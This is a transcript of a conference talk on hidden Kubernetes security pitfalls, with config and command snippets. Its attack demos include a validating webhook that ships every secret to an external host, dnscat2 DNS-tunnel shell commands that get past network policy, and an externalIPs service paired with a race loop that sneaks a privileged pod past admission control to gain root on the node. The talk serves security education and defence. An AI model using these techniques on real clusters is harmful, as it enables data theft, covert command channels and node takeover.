My name is Kat Cosgrove, I am your moderator for this session, and this is Kubernetes Exposed! Seven of Nine Hidden Secrets That Will Give You Pause, presented by the incomparable Ian Coldwater of Twilio and Brad Geesaman of Aqua Security. Just a reminder, please hold your questions until after the session is over; then you can raise your hand and I will come find you with a microphone, or you can ask in the MeetingPlay app. Enjoy the talk.

Hi everybody, can you hear me? Yep. Y'all in the back too? Sounds good. Fabulous. Okay. Hi! Welcome to Kubernetes Exposed! Seven of Nine Hidden Secrets That Will Give You Pause. If you are in the room for another talk, you are in the wrong room, and that's okay, we can hang out anyway. My name's Ian Coldwater. I am co-chair of Kubernetes SIG Security, and I hack container things. Hi, I'm Brad. I'm the Director of Cloud Security at Aqua Security, and I also hack container things.

If you're new to Kubernetes, you may have noticed some things along your way that make you go, hmm. Some unexpected behaviors, maybe some weird surprises. If this sounds familiar to you, you're not alone. We've been working with Kubernetes for a while now, and we've seen a lot of strange behaviors. Wild surprises, unexpected gotchas, things that don't always work the way you think they will. And frankly, there are a lot of things that you might not be aware of that you might need to know. So today, we figured we'd share some of those with you. Grab your popcorn and your 3D glasses, and let's explore some of the hidden secrets, weird science, and fun twists and turns in the land of Kubernetes. Watch out for jump scares.

So here's a quick one. You might think that since Kubernetes heavily uses PKI for authentication, there would be a way to revoke a specific certificate if one of the certificate pairs ever got compromised. That would be sensible, right? That seems like it would make sense, but that's not actually how it works. OCSP stapling is not supported. This is a long-time issue in Kubernetes. Like, no, literally, a long-time issue: there is a Kubernetes issue from 2015 about this specifically. So wait, really, what do you have to do then when your cluster gets popped? Well, to be completely safe, you have to rebuild the entire CA chain and redistribute new certificates everywhere. So wait a second, won't that take down the entire cluster? Sure will. Some managed providers will help you with this, but even if they do, it's almost always going to need some downtime. So it's an important thing to be aware of and to be prepared for.

Here's another one. Docker has a solid default seccomp profile for containers. It restricts syscalls in a really smart way. Props to Jess for that awesome work. Since Docker builds containers and Kubernetes orchestrates containers, you might think that Kubernetes would inherit that profile out of the box, right? Right, because doesn't Kubernetes just leverage the runtime's profile by default? I mean, right? I mean, that would be sensible, but it's not actually how it works. Kubernetes overrides Docker's default seccomp profile and makes it Unconfined. What this means, for people who are not Linux security nerds in the room, is that it turns it off. All of those syscalls that Docker very sensibly restricts, Kubernetes just turns around and allows again. Wait a second. I thought SeccompDefault went alpha in Kubernetes 1.22, so it's on by default, right? Well, SeccompDefault is a great-sounding name, right? We've got seccomp, by default, on by default. That's great. We've been waiting for that forever. Okay, the thing is that it's not actually on by default. You have to turn it on, and not only that, you have to turn it on twice. The cluster administrator or your cloud provider needs to turn that feature gate on, since it's alpha, and even after that feature gate has been turned on, there is a kubelet flag that needs to be set on every single node. If both of those things don't happen, or if they happen incorrectly, that default seccomp is actually default off.
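To make that concrete, here's a rough sketch of what turning it on actually involves, with placeholder names for the pod and image. The per-pod field opts a single workload back into the runtime's default profile; the kubelet settings are the two switches that together make it the node-wide default.

    # Per-pod opt-in: explicitly request the runtime default seccomp profile,
    # since Kubernetes won't apply it on its own.
    apiVersion: v1
    kind: Pod
    metadata:
      name: demo                      # placeholder
    spec:
      securityContext:
        seccompProfile:
          type: RuntimeDefault        # instead of the implicit Unconfined
      containers:
      - name: app
        image: nginx                  # placeholder

    # Per-node (alpha in 1.22): both the feature gate and the kubelet setting
    # are needed, on every node, or it stays default-off.
    # KubeletConfiguration snippet:
    featureGates:
      SeccompDefault: true
    seccompDefault: true
    # or via kubelet flags: --feature-gates=SeccompDefault=true --seccomp-default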
Here's another thing you might not be aware of. You might think if you delete a ClusterRoleBinding, it's gone, right? That seems like it would be sensible, but it doesn't always work that way. There's one special exception, and it can be a dangerous one. That exception is system:masters, which is hard-coded in Kubernetes to be cluster-admin. And surprise, even if you delete it, this one sticks around. Because it's hard-coded, you can't actually really get rid of it. If you give out certificate pairs that are part of system:masters, they are always cluster-admin. Their permissions won't actually be gone, even if you delete them. We need to test this one out to be sure.

Okay, you can see my screen. Great. So I'm running a kind cluster. That's running kubeadm under the hood, and it puts that system:masters certificate pair in the local kubeconfig. So I'm going to run a fancy command under the hood, I won't bore you with it, but I'm just going to extract and show you that that is what is in the actual certificate. So you see system:masters. So I have this credential here locally. If I use this credential to authenticate to the cluster, and I run kubectl auth can-i --list, this is a command that says, what permissions do I have when it comes to RBAC? Very useful. If you look at the top two lines here, you can see *.* on the resources and * on the verbs, and * on the non-resource URLs and * on the verbs. Those two lines are basically saying, you are allowed to do anything inside the cluster. All's well and good, right?

So let's look at the ClusterRoleBinding named cluster-admin. It's kind of confusing, but this is the default ClusterRoleBinding. It says that system:masters, the group, is bound to cluster-admin. That's where the explicit definition of those stars happens. So we're going to go ahead and delete that. Wonder what will happen. So did we lose access for system:masters? Did we delete our ability to be system:masters? Did we actually delete that? Let's find out. We'll run kubectl auth can-i --list again. The stars are gone. So did we lose that permission? Well, let's just find out. Let's go ahead and recreate that exact same ClusterRoleBinding. And the astute viewers out there will know that you shouldn't be able to give yourself permissions that you don't have access to, but you can. There, I'm cluster-admin again. And we're going to show that, just to prove it, there's no cards up the sleeves. Auth can-i --list, and the stars are back. We're all made of stars, but your RBAC shouldn't be.
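If you want to poke at this yourself, the demo boils down to roughly the following on a kind cluster; the jsonpath index assumes the admin credential is the first user entry in your kubeconfig, so adjust as needed.

    # Show the group baked into the client certificate kind/kubeadm hands you.
    kubectl config view --raw -o jsonpath='{.users[0].user.client-certificate-data}' \
      | base64 -d | openssl x509 -noout -subject
    # expect something like: subject=O = system:masters, CN = kubernetes-admin

    # What can this credential do?
    kubectl auth can-i --list

    # Delete the binding that spells out those permissions...
    kubectl delete clusterrolebinding cluster-admin
    kubectl auth can-i --list       # ...and the stars disappear from the listing...

    # ...but system:masters is hard-coded as a superuser in the API server,
    # so we can simply recreate the binding, even though RBAC says we shouldn't
    # be able to grant permissions we no longer hold.
    kubectl create clusterrolebinding cluster-admin \
      --clusterrole=cluster-admin --group=system:masters
    kubectl auth can-i --list       # ...and the stars are back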
Thinking of some things that you shouldn't be able to do, but you can: you might think that validating webhooks are good for enforcing policy on resources as they hit the API server, right? But they're good for a lot more than that. They're useful for all kinds of things. For example, they can be a high-performance data exfiltration tool, sometimes avoiding those pesky network egress charges.

So here's how validating webhooks are supposed to work, right? In step one, you have a pod spec. In step two, you submit it to the API server, authenticated as the right user. In step three, you have a create-pod request, in this case. If you have a validating webhook, then in step four it takes that entire pod spec and sends it off to another pod. That pod is number five, and that pod's job is to look at that spec and say allow or block based on what's in it. Okay, so that's basically how admission control works. So that's how admission control is supposed to work. We can use the way that those things work to make them useful for us as attackers too.

So here's one thing we could do. We could set up an external server, maybe one in a different cloud provider, and we can set it up to listen on TLS and log what gets sent to it. Then we could set up a ValidatingWebhookConfiguration that points to it when resources like secrets are created. Yeah, you could embed the data that you want to leak, or exfiltrate, or back up to yourself, right, in the request to create the secret. We know that secrets and ConfigMaps can store about a megabyte each, and the control plane will use its highly efficient goroutines (thanks, developers who wrote those) to send that data to the listener. The control plane systems in managed Kubernetes providers don't seem to filter out TCP 443 outbound. And it comes from a VPC that in some cases might not be one that you get billed for. Disclaimer: that's not an officially supported use case. Additional disclaimer: neither of us works for a cloud provider. Anywho, moving on. Let's see that in action.

So let's exfiltrate some data. I have very important documents in Latin, about a megabyte of it, 3,400 lines or so, just to give you a mental picture of how much that is; the works of Shakespeare are in there somewhere. And we have an exfiltrating webhook. What we've configured here, if you look at the very bottom line, is that we're going to send this to an external server named honk.sh whenever a create or an update on a secret happens. So, a copy of that secret. If you remember from our previous talk, that was kind of sneaky too, but here we're using the secret as a carrier for this data. So we're going to apply that ValidatingWebhookConfiguration, like a good administrator. Or not. Evil. Okay. We're going to look at that configuration just so that you can see what it looks like. There are some CA bundle things in here. This is basically just showing you that every time a secret is touched, we're going to send it to that URL.

So what we're going to do is deploy a pod inside our cluster. And its job, I'll show you in a second; I just want to show you the deployment. Right here at the bottom, its job is to do a loop to simulate our highly efficient exfiltration system. We're going to do a kubectl create secret and send that one megabyte with every one of those requests. Okay, so I'm going to apply this to the cluster. I'm going to get the pods. We see it's running. Okay, now in the background, it's backing up important data, or exfiltrating important data. So let's go over to our external server and SSH into it. And for the nginx admins out there, you'll recognize the access logs. We're just going to tail those. And as you can see, we're backing up at high speed. Again, I don't know who in the room here might be from GCP. I don't know if those IPs look familiar to you. They might.
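For the curious, the exfiltrating webhook itself is nothing exotic. A minimal reconstruction looks something like this; the name, URL, and CA bundle are placeholders standing in for the external listener from the demo, and the rest are standard admissionregistration.k8s.io/v1 fields.

    apiVersion: admissionregistration.k8s.io/v1
    kind: ValidatingWebhookConfiguration
    metadata:
      name: totally-legit-backups          # placeholder
    webhooks:
    - name: backup.honk.sh                 # placeholder; must look like a DNS name
      clientConfig:
        url: https://honk.sh/ingest        # external server that just logs request bodies
        caBundle: <base64-encoded CA for the listener's TLS certificate>
      rules:
      - apiGroups: [""]
        apiVersions: ["v1"]
        operations: ["CREATE", "UPDATE"]
        resources: ["secrets"]             # every secret touched gets shipped out
      failurePolicy: Ignore                # don't break the cluster if the listener is down
      sideEffects: None
      admissionReviewVersions: ["v1"]
      timeoutSeconds: 5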
It's very important to back up your data, you know. So, pretty cool. Yeah. You know what? It's free real estate. You know what else we could use for nefarious purposes? Working as designed: DNS. You know the saying, it's always DNS. We've all been there. DNS can cause all kinds of problems. Any pod that needs to communicate with another service needs DNS. So most admins doing the right thing and using network policy still have to poke a hole in their firewall rules for DNS lookups. And that's actually all an attacker needs for a command and control channel if they compromise a running container. So you see this pod in the red? Without any egress filtering, it can directly communicate with an external server. That's often the default, although not the most secure approach.

As a red teamer, DNS is really useful for me. Besides, you know, causing outages: if I have data I need to exfiltrate, a lot of the time I'll need to figure out a way to do that. And sometimes that can be really hard, especially if egress is really locked down. But there's often at least one exception. There's almost always a DNS path outbound. It might not be a direct path outbound, but if you can get onto an internet-connected box and get remote code execution on it, you can get data out of it via DNS. One of the ways to do this is to hide your communications within valid DNS traffic, within the lookups. This is called DNS tunneling. And there are tools available that make this really easy to use and challenging for admins to detect reliably at scale. Some Kubernetes admins watching or listening to this might think that this wouldn't apply to their clusters because they have strict network policy in place. Nothing's getting out of there. They're good, right? Well, maybe not so much. Right. Even if all direct outbound access is blocked, we typically have to open up UDP port 53 to the kube-dns pods in the kube-system namespace, because that enables service discovery. That's how things need to work. So we can use DNS tunneling from a pod to an attacker. And we're going to show you how. There it is on the display. Okay.

So on my attacking server, out on the public internet, I'm going to SSH to it. And I'm going to run something called dnscat2. Raise your hand if you've ever heard of dnscat2. We've got some DNS tunnelers in the room. Cool. This is our C2. This is what's going to capture all the sessions from our compromised systems. C2 stands for command and control. Thank you. So over here, switching gears, I'm on the cluster that I'm going to compromise. Now for the sake of this, we're going to presume that we've gotten access to this specific pod once it runs in the cluster. So our worldview from an attacker's perspective is: I have a shell on this pod. What things can I connect to, and how? And what we're going to do is use various methods to probe and test that we have egress, or outbound access. In this case, we're going to use standard curl, my favorite hacking tool; I know you have those as well. Curl to honk.sh on TCP 443, right? This succeeds. There are no surprises here, okay? We're just validating. We have TCP outbound. But we were talking about DNS, weren't we? So in this same pod, we're going to switch to the dnscat binary that we've already embedded and deployed to this system. And we're going to reach directly out from this pod inside this cluster, directly out to this C2 server, using UDP 53. So it's a direct connection. There's no Mallory in the middle.
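As a sketch of what's actually being typed in this part of the demo, assuming dnscat2, with honk.sh standing in for the attacker-controlled domain and C2-IP for the server's address, the two ends look roughly like this; check the dnscat2 README for the exact flags your build supports.

    # On the attacker's internet-facing server (the C2), answer tunneled lookups
    # for a domain we control:
    ruby dnscat2.rb honk.sh

    # On the compromised pod, direct mode: straight UDP 53 to the C2, no resolvers involved.
    ./dnscat --dns server=<C2-IP>,port=53

    # Indirect mode: encode the tunnel in lookups under honk.sh, so the traffic rides
    # through kube-dns and the public DNS hierarchy instead of going out directly.
    ./dnscat honk.sh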
And it establishes a session just like that. So if we switch back over, now we go back over to our server, you can see it has created a new session. So if I run sessions, you see that number one is added there; that's a new session. So I'm going to interact with it using dash i. It's kind of like a tab in a browser, so we're switching tabs over. And you can see the things that we have access to. Personally, I like running shells. I'm going to run a shell. And again, it sort of spawns another new tab on session two. So we'll Ctrl-Z out of that and interact with session two. Cool. Now, entirely via DNS requests, we can run commands on that pod. Okay. This is direct UDP. Okay.

Okay. So let's be good administrators and apply some network policy. We have two policies here. And I know they're hard to understand; that's okay, we'll walk through this. The top one says: ingress and egress, deny everything in the default namespace. So the pod, if you apply just that, will be able to communicate with nothing. The second policy, right below it, pokes that hole for UDP 53 within the private IP space of this cluster, so it can do DNS within the cluster. So let's apply that. It's totally secure. Let's lock it down. Apply security. Okay, kubectl apply. Done.

Okay. So we're going to go back to that same pod. Now it has that warm blanket of a nice network policy that only allows DNS to the kube-dns pods. We're going to try those connections again. So we're going to be on that pod. We're going to try to reach out. And it blocks, right? That's expected. Cool. Just wait five seconds. It's not going to make it. Let's try dnscat direct mode again, where again, we're trying to do UDP 53, straight shot, to that server. Not going to work either. We've blocked that successfully. How many people think the job is done? Oh, thank you. I think we know better than that. Let's change it to hostname lookup mode, indirect mode, whatever you want to call it: basically encoding the entire tunnel in random hostname DNS requests. It's going to go through kube-dns, to a public DNS server, and all the way to our destination. And it still works. And it probably looks like pretty normal traffic. All right. We have that command session. Sounds good, right? All right. I guess it really always is DNS.
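For reference, the two policies from that demo look more or less like this; the names and the CIDR are placeholders, and the pod selectors are left wide open on purpose. The point is the default-deny plus the UDP 53 carve-out, which is exactly the path the indirect tunnel rides.

    # Policy 1: deny all ingress and egress for every pod in the default namespace.
    apiVersion: networking.k8s.io/v1
    kind: NetworkPolicy
    metadata:
      name: default-deny-all
      namespace: default
    spec:
      podSelector: {}
      policyTypes: ["Ingress", "Egress"]
    ---
    # Policy 2: poke the hole every cluster needs: DNS egress to the private IP space.
    apiVersion: networking.k8s.io/v1
    kind: NetworkPolicy
    metadata:
      name: allow-dns-egress
      namespace: default
    spec:
      podSelector: {}
      policyTypes: ["Egress"]
      egress:
      - to:
        - ipBlock:
            cidr: 10.0.0.0/8            # placeholder for the cluster's private range
        ports:
        - protocol: UDP
          port: 53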
So if we're thinking about wild things that we could potentially do with Kubernetes networking, we've got other options. It isn't just DNS. Have you seen CVE-2020-8554? It's okay if you don't remember; CVE numbers are not terribly human-friendly. In this CVE, services that use the external IP configuration can disrupt or redirect traffic within the cluster. External IP services are pretty uncommon, but they're very powerful and they can be very useful. For example, they have a useful ability to modify iptables. They are literally redirection as a service. So let me explain. You see this pod YAML, or sorry, the service YAML. What it really says is: all traffic within the cluster going to this external IP is redirected to the nginx pod on port 80. I'll say that again. All traffic going to an external IP is going to this pod right here. And what namespace are we in? We're in default. We have no special privileges. We're just one service in one namespace, but we can cross all namespaces and modify the routing to that IP with this service. So we can disrupt or redirect traffic within a cluster. Could we also disrupt or redirect traffic out of the cluster? Like, make it go somewhere else entirely. Could we do that? Yeah.

I mean, we know that important things like validating webhooks rely on services. We could disrupt the traffic from the control plane going to the validating webhook pods. Huh. So could we, like, sneak a privileged pod past a validating webhook just by creating a service? Would that work? So remember from before how validating webhooks normally work. When you submit a pod, the API server reaches out to a trusted pod via TLS to get an allow or a block response. That makes sense. But wait a minute. What if that admission control pod isn't running, or it isn't on the network? Would it still work the same way? That depends. If the configuration is set to fail open, then after a few seconds of it not responding, it allows the request. And the failurePolicy: Ignore setting is pretty typical of default settings for webhooks, because failing closed might cause even more damage. It might actually cause an outage or block an upgrade. Raise your hand if you've ever been blocked by a webhook failing closed. Anyone? Yes, I see some hands. Fantastic. So you know the pain. So if that's the case, we could deploy an external IP service to redirect the traffic from the control plane going to the validating webhook pod to somewhere else entirely. And then we could cause it to fail open. I think that might buy us enough time to get a privileged pod through. I bet that'll work. Let's try it. I hope you all still have some popcorn left.

One second. There we go. Okay, I'm going to leave that. So we have a default cluster. This is a separate cluster entirely from the previous demos. And we've installed Kyverno with the defaults, okay? Just kubectl apply from the docs, straight in. And by default, the policies don't enforce, they audit, okay? But we want to block privileged pods in this specific case. So what we have to do is submit this policy and change the word audit to enforce. So I'm going to go ahead and apply that, to block privileged pods. So let's do that. Again, we're applying security in one good shot. There we go. Security is very important. So let's test that. We always need to validate these assumptions, right? That's what this whole talk is about, validating these assumptions. So Ian, and Duffie (there you are, Duffie, shout out), brought this to my attention a long time ago. And it's just elegant and brilliant: if you can run a privileged pod, you can, in the same breath, basically nsenter and escape to the node. So this is a one-shot escape. It's blocked. It did its job. Hate it when that happens. So are we done? I don't think so.

Let's create an external IP service pointing at those validating webhook pods. In the top lines here, we're going to get the Kyverno service IP and the Kyverno pod replica IP. We're going to grab those. We're going to also deploy an nginx deployment in the default namespace. So I'm just a developer in the default namespace, right? I don't really have that many permissions, but maybe I can create pods and create services, right? So I'm going to create nginx and have it listening on port 80; that's important in a second. Then we're going to create a service with the pod IP of Kyverno and the service IP of Kyverno, such that all traffic in the cluster, remember, all traffic, including control plane to validating webhook traffic, going to port 9443 gets redirected to port 80 on nginx. So what's going to happen?
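Here's a rough reconstruction of that shadow service; the IPs are obviously placeholders for whatever you pulled out of the kyverno namespace, and the names don't matter. The trick is that externalIPs tells kube-proxy to grab in-cluster traffic destined for those addresses and hand it to our nginx endpoints instead.

    apiVersion: v1
    kind: Service
    metadata:
      name: totally-not-kyverno
      namespace: default               # an unprivileged namespace is all we need
    spec:
      selector:
        app: nginx                     # our own pods, listening on port 80
      ports:
      - port: 9443                     # the port the webhook traffic targets in the demo
        targetPort: 80
      externalIPs:
      - 10.96.123.45                   # placeholder: the Kyverno service ClusterIP
      - 10.244.1.23                    # placeholder: the Kyverno pod replica IP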
nginx is going to go, I don't know what to do with this, and just send back an error, right? The actual attack is kind of interesting. We scale the nginx deployment up to two, so we add another nginx pod. Then we try to submit the privileged pod. Then we scale nginx up to three. And then we immediately scale it back down to two. Now, why would we want to do that? Because we're forcing kube-proxy to reset iptables and reshuffle things. We're causing chaos and churn in the networking stack to try to increase the chances that we're breaking connections that may have already been established through the connection tracking table. All that to say: we're playing some shenanigans with iptables.

So let's run this attack. And it's going to go in this loop. We're going to create the deployment, make it two replicas, try the privileged pod, scale to three, back to two. And this is going to go on a loop. What I want to show you over here are the logs from the validating webhook pod. So it's just doing its job. It's blocking the privileged pod, right? We're all good, right? Maybe. And now we wait. Over on the other end here, we're waiting for this race condition to happen. And race conditions are notoriously not really reliable, so you don't really know how long they're going to take. So we don't really know how long we're going to do this, so I'm going to talk to you for a minute about race conditions. If you would like to hear me talk more about race conditions, and hear Fred talk more about race conditions, come see the talk in this exact room immediately after this one, called Exploiting a Slightly Peculiar Volume Configuration, where we, with our hacker crewmates in SIG-Honk, exploit a race condition in runc.

What's going on over here, Brad? So we are still trying. Hopefully the administrator hasn't been woken up by this point, because I don't know if you get a lot of alerts on privileged pods being blocked, but we have a short window here that we can hopefully hit, generally 30 to 90 seconds, where this succeeds. So I just wanted to show you what it looks like. We're causing churn. We're purposely telling the service to add and remove replicas from the service's EndpointSlices, right? So we're just trying to cause it. Can you grab one more? Yes. So this is the attack pod. This is just nginx. We'll see it. There it is. Hold on a second. We're doing a kubectl run, so we've got to pull the image really quick and then get a shell. So we'll see. And as you can see, Kyverno performed a leader election and lost it because of a health check. So Kyverno shut down just in this moment. Let me go over here. It's creating. It's promising. Success. Check it out. Now we're root on the node.

It's important to note that this behavior is not unique to Kyverno, although we're using them for the demo. We're not picking on them, or at least not only them. Any product that uses validating webhooks in this manner is also vulnerable to this, including Gatekeeper and some vendor products that you have definitely heard of. Anyway. So yeah, now that you've seen what can be done with these, you should probably block or restrict external IP services with admission control policies, because as we've seen, external IP services are extremely powerful and can cause a lot of problems on purpose, especially for multi-tenant clusters.
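Since the advice is to restrict external IP services with admission control, here's the shape of a Kyverno policy that does it. It's a paraphrase of the restrict-external-ips sample from the Kyverno policy library, so treat the exact pattern syntax as approximate and check the upstream sample before relying on it.

    apiVersion: kyverno.io/v1
    kind: ClusterPolicy
    metadata:
      name: restrict-external-ips
    spec:
      validationFailureAction: Enforce       # block, don't just audit
      rules:
      - name: check-external-ips
        match:
          any:
          - resources:
              kinds: ["Service"]
        validate:
          message: "externalIPs are not allowed on Services."
          pattern:
            spec:
              # conditional anchor: only evaluated when externalIPs is present;
              # restrict it to an explicit allow-list (placeholder address).
              =(externalIPs): ["203.0.113.81"]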
Indeed. As we said, Kubernetes is full of unexpected surprises. Things might not quite work the way you think they do. Things might actually be dangerous in the ways they differ from your assumptions. So check your assumptions. It is possible to secure Kubernetes, but in order to get there, you really need to know how it works, and not just how you think it works; know how it really works. And you can do it. We believe in you. Here's a list of resources and links for further reading and viewing, and we hope you've had as much fun as we have exploring some of our favorite interesting behaviors, and maybe a jump scare or two, in the fun land of Kubernetes. Yeah, we've had a lot of fun with it, so thanks so much for joining us. Stay safe and keep exploring. Thanks, everybody.